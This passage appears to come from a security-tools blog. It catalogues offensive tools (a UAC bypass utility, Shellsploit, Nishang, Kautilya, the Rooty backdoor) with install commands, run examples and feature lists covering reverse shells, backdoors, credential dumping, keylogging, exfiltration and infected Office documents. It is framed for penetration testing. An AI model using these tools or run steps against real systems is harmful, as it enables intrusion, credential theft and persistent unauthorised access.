15 – Win32/Addrop method, also used in Metasploit uacbypass module, works from Windows 7 up to 10rs1 11082;
16 – Hybrid method working together with Microsoft GWX backdoor, work from Windows 7 up to 10rs1 11082.

Note:
+ Several methods require process injection, so they won’t work from wow64, use x64 edition of this tool;
+ Method (4) unavailable in 64 bit edition because of Shim restriction;
+ Method (6) unavailable in wow64 environment starting from Windows 8. Also target application unavailable in Windows 10;
+ Method (11) implemented in x86-32 version;
+ Method (13) implemented only in x64 version.

Run examples:
BypassUAC_x86.ex 1 -16 cmd.exe
BypassUAC_x64.ex 3 cmd.exe

Download : BypassUAC.zip
Source :https://github.com/xsysvermin

Shellsploit let’s you generate customized shellcodes, backdoors, injectors for various operating system. And let’s you obfuscation every byte via encoders.
Requirement:
+ capstone
+ readline

shellsploit

changelog 27/1/2016: shell: exec scripts on maintenance.

Usage & Installation:

git clone https://github.com/b3mb4m/shellsploit-framework && cd shellsploit-framework
sudo pip install capstone
sudo pip install readline
python setup.py -s install
shellsploit (for run)

Updates:
cd shellsploit-framework
git pull origin master

Source : https://github.com/b3mb4m

Changelog v0.6.3:
+ Added Invoke-Interceptor to the MITM directory.

Parameter Invoke-Interceptor

DESCRIPTION
This script uses MJPEG to stream a target’s desktop in real time. It is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port.
A netcat listener which relays connection to a local port could be used as listener. A browser which supports MJPEG (Firefox) should then be pointed to the local port to see the remote desktop.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.

Nishang v-0.6.2 released: PowerShell for penetration testing and offensive security.

Scripts; Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak :Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster FireListener: A pair of scripts for egress testing
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys: Get WLAN keys in plain text from a target.

+ Keylogger
Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade: Dump user passwords in plain on Windows 8.1 and Server 2012
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– reate-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay Create network relays between computers.

+ Prasadhak
– Prasadhak : Check running hashes of running process against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
Powerpreter : All the functionality of nishang in a single script module.

+ Shells :
– Invoke-PsGcat: Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence: Remote persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip(951 KB) | Our Post Before
Source : http://www.labofapenetrationtester.com/

Roadmap Changelog
Latest Change 11/2/2016 v0.5.6.1:
+ Added Invoke-PosRatHttps in the extras directory.
v0.5.6:
– Added “Reverse TCP Shell” under the Execute category.
– Added “Reverse UDP Shell” under the Execute category.
– Added “Reverse ICMP Shell” under the Execute category.
– Added “Reverse HTTPS Shell” under the Execute category.
– Added “Reverse HTTP Shell” under the Execute category.
– Fixed a bug in “Dump passwords in plain”.
– Added a standard disclaimer..

Kautilya is a toolkit which provides various payloads for a Human Interface Device which may help in breaking in a computer during penetration tests.

List of Payloads:
– Windows
Gather
+ Gather Information
+ Hashdump and Exfiltrate
+ Keylog and Exfiltrate
+ Sniffer
+ WLAN keys dump
+ Get Target Credentials
+ Dump LSA Secrets
+ Dump passwords in plain
+ Copy SAM
+ Dump Process Memory
+ Dump Windows Vault Credentials

Execute
+ Download and Execute
+ Connect to Hotspot and Execute code
+ Code Execution using Powershell
+ Code Execution using DNS TXT queries
+ Download and Execute PowerShell Script
+ Execute ShellCode
+ Reverse TCP Shell

Backdoor
+ Sethc and Utilman backdoor
+ Time based payload execution
+ HTTP backdoor
+ DNS TXT Backdoor
+ Wireless Rogue AP
+ Tracking Target Connectivity
+ Gupt Backdoor

Escalate
+ Remove Update
+ Forceful Browsing

Manage
+ Add an admin user
+ Change the default DNS server
+ Edit the hosts file
+ Add a user and Enable RDP
+ Add a user and Enable Telnet
+ Add a user and Enable Powershell Remoting

Drop Files
+ Drop a MS Word File
+ Drop a MS Excel File
+ Drop a CHM (Compiled HTML Help) file
+ Drop a Shortcut (.LNK) file
+ Drop a JAR file

Misc
+ Browse and Accept Java Signed Applet
+ Speak on Target

– Linux
+ Download and Execute
+ Reverse Shells using built in tools
+ Code Execution
+ DNS TXT Code Execution
+ Perl reverse shell (MSF)

– OSX
+ Download and Execute
+ DNS TXT Code Execution
+ Perl Reverse Shell (MSF)
+ Ruby Reverse Shell (MSF)

Payloads Compatibility
+ The Windows payloads and modules are written mostly in powershell (in combination with native commands) and are tested on Windows 7 and Windows 8.
+ The Linux payloads are mostly shell scripts (those installed by default) in combination with commands. These are tested on Ubuntu 11.
+ The OS X payloads are shell scripts (those installed by default) with usage of native commands. Tested on OS X Lion running on a VMWare

Usage:

git clone https://github.com/samratashok/Kautilya && cd Kautilya
bundle install
ruby kautilya.rb

Updates:
git pull origin master

Source: https://github.com/samratashok

Latest Changes 26/2/2016:
– Removing FreeBSD and CCDC files for now.
– msf & src; Moving everything to ICMP echo request ID.

Rooty based idea from SilentDoor  ; PCAP-based backdoor for linux that uses packet sniffing to bypass netfilter. It sniffs for UDP packets on port 53, runs each packet against a decryption scheme, if the packet validates than it runs a command. Can be masked to look like any other process. Remote command utility included.
Also includes the ability to send shellcode for execution and a connectionless shell functionality

rooty client.py

+ To build, you only need to have libpcap development files installed.
+ Then you should only have to run make.
+ To make a debug build with error message run: make debug
+ If you have upx installed and would liked a packed version: make upx

Now requires https://github.com/SoldierX/libhijack for shellcode injection into other processes.

Installation:

git clone https://github.com/SoldierX/libhijack && cd libhijack
./build.sh

git clone https://github.com/linuxgeek247/rooty && cd rooty
./autojunk.sh
make

Download : Master.zip  | Clone Url | Our Post Before
Source : https://github.com/linuxgeek247